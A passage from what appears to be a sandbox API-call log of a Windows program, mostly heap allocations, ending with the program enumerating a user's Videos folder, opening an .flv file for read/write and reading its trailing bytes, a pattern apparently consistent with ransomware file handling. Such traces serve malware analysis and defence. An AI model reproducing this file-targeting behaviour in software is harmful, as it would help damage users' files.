hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\") returned="sFJurkoQTJwuNyD54_K\\" [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311eb98 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\") returned="sAsxhx217z\\" [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f0f8 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311eb98 | out: hHeap=0x680000) returned 1 [0099.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\") returned="z4k8sZRNNGS3Ve7W-\\" [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f0f8 | out: hHeap=0x680000) returned 1 [0099.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\") returned="Yo5RRMrTBRvZPTzk\\" [0099.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0099.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0099.083] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0099.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc0b8 [0099.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0099.083] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc0b8 | out: hHeap=0x680000) returned 1 [0099.083] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.083] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.083] PathFindFileNameW (pszPath="") returned="" [0099.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe0) returned 0x3199338 [0099.083] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29da8c10, ftCreationTime.dwHighDateTime=0x1d5c356, ftLastAccessTime.dwLowDateTime=0x6700eb50, ftLastAccessTime.dwHighDateTime=0x1d5b5b1, ftLastWriteTime.dwLowDateTime=0x6700eb50, ftLastWriteTime.dwHighDateTime=0x1d5b5b1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0099.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3199338 | out: hHeap=0x680000) returned 1 [0099.083] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29da8c10, ftCreationTime.dwHighDateTime=0x1d5c356, ftLastAccessTime.dwLowDateTime=0x6700eb50, ftLastAccessTime.dwHighDateTime=0x1d5b5b1, ftLastWriteTime.dwLowDateTime=0x6700eb50, ftLastWriteTime.dwHighDateTime=0x1d5b5b1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.083] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x770ccf50, ftCreationTime.dwHighDateTime=0x1d5bbc4, ftLastAccessTime.dwLowDateTime=0x704c0010, ftLastAccessTime.dwHighDateTime=0x1d5b5d8, ftLastWriteTime.dwLowDateTime=0x704c0010, ftLastWriteTime.dwHighDateTime=0x1d5b5d8, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f-6wzGI cjqU38MV0oz.flv", cAlternateFileName="F-6WZG~1.FLV")) returned 1 [0099.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x136) returned 0x31ce620 [0099.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.083] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\f-6wzGI cjqU38MV0oz.flv") returned=".flv" [0099.083] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\f-6wzGI cjqU38MV0oz.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\f-6wzgi cjqu38mv0oz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0099.084] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=1150) returned 1 [0099.084] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0099.087] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x458, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.087] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0099.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.088] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 